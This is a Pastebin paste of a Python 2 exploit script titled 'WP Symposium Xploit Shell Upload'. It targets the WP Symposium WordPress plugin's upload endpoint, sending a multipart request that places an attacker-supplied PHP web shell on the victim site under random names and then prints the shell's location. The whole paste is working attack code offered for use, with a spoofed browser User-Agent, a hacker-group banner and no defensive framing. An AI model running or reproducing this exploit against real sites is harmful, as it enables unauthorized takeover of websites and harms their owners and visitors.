AbdulMuttaqin

WP Symposium Xploit Shell Upload

Sep 2nd, 2018
470
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.05 KB | None | 0 0
  1.  
  2. # Http connection
  3. import urllib, urllib2, socket
  4. #
  5. import sys
  6. # String manipulator
  7. import string, random
  8. # Args management
  9. import optparse
  10. # File management
  11. import os, os.path, mimetypes
  12.  
  13. # Check url
  14. def checkurl(url):
  15.     if url[:8] != "https://" and url[:7] != "http://":
  16.         print('[X] You must insert http:// or https:// procotol')
  17.         sys.exit(1)
  18.     else:
  19.         return url
  20.  
  21. # Check if file exists a,nd has readable
  22. def checkfile(file):
  23.     if not os.path.isfile(file) and not os.access(file, os.R_OK):
  24.         print '[X] '+file+' file is missing or not readable'
  25.         sys.exit(1)
  26.     else:
  27.         return file
  28. # Get file's mimetype
  29. def get_content_type(filename):
  30.     return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
  31.  
  32. def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
  33.     return ''.join(random.choice(chars) for _ in range(size))
  34.  
  35. # Create multipart header
  36. def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
  37.  
  38.    getfields = dict()
  39.    getfields['uploader_uid'] = '1'
  40.    getfields['uploader_dir'] = './'+randDirName
  41.    getfields['uploader_url'] = url_symposium_upload
  42.  
  43.    payloadcontent = open(payloadname).read()
  44.  
  45.    LIMIT = '----------lImIt_of_THE_fIle_eW_$'
  46.    CRLF = '\r\n'
  47.  
  48.    L = []
  49.    for (key, value) in getfields.items():
  50.       L.append('--' + LIMIT)
  51.       L.append('Content-Disposition: form-data; name="%s"' % key)
  52.       L.append('')
  53.       L.append(value)
  54.  
  55.    L.append('--' + LIMIT)
  56.    L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
  57.    L.append('Content-Type: %s' % get_content_type(payloadname))
  58.    L.append('')
  59.    L.append(payloadcontent)
  60.    L.append('--' + LIMIT + '--')
  61.    L.append('')
  62.    body = CRLF.join(L)
  63.    return body
  64.  
  65. banner = """
  66.   ____                      _        ____          _
  67. / ___| __ _ _ __ _   _  __| | __ _ / ___|___   __| | ___ _ __ ___
  68. | |  _ / _` | '__| | | |/ _` |/ _` | |   / _ \ / _` |/ _ \ '__/ __|
  69. | |_| | (_| | |  | |_| | (_| | (_| | |__| (_) | (_| |  __/ |  \__ \
  70.  \____|\__,_|_|   \__,_|\__,_|\__,_|\____\___/ \__,_|\___|_|  |___/
  71. """
  72.  
  73. commandList = optparse.OptionParser('usage: %prog -t URL -f NAMASHELL.PHP [--timeout ]')
  74. commandList.add_option('-t', '--target', action="store",
  75.                   help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
  76.                   )
  77. commandList.add_option('-f', '--file', action="store",
  78.                   help="Insert file name, ex: shell.php",
  79.                   )
  80. commandList.add_option('--timeout', action="store", default=10, type="int",
  81.                   help="[Timeout Value] - Default 10",
  82.                   )
  83.  
  84. options, remainder = commandList.parse_args()
  85.  
  86. # Check args
  87. if not options.target or not options.file:
  88.     print(banner)
  89.     commandList.print_help()
  90.     sys.exit(1)
  91.  
  92. payloadname = checkfile(options.file)
  93. host = checkurl(options.target)
  94. timeout = options.timeout
  95.  
  96. print(banner)
  97.  
  98. socket.setdefaulttimeout(timeout)
  99.  
  100. url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
  101.  
  102. content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
  103.  
  104. randDirName = id_generator()
  105. randShellName = id_generator()
  106.  
  107. bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
  108.  
  109. headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
  110.            'content-type': content_type,
  111.            'content-length': str(len(bodyupload)) }
  112.  
  113. try:
  114.     req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
  115.     response = urllib2.urlopen(req)
  116.     read = response.read()
  117.  
  118.     if "error" in read or read == "0" or read == "":
  119.        print("[X] Upload Failed :(")
  120.     else:
  121.        print("[>]Shell Uploaded")
  122.        print("[--] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
  123.  
  124. except urllib2.HTTPError as e:
  125.     print("[X] "+str(e))
  126. except urllib2.URLError as e:
  127.     print("[X] Connection Error: "+str(e))
Add Comment
Please, Sign In to add comment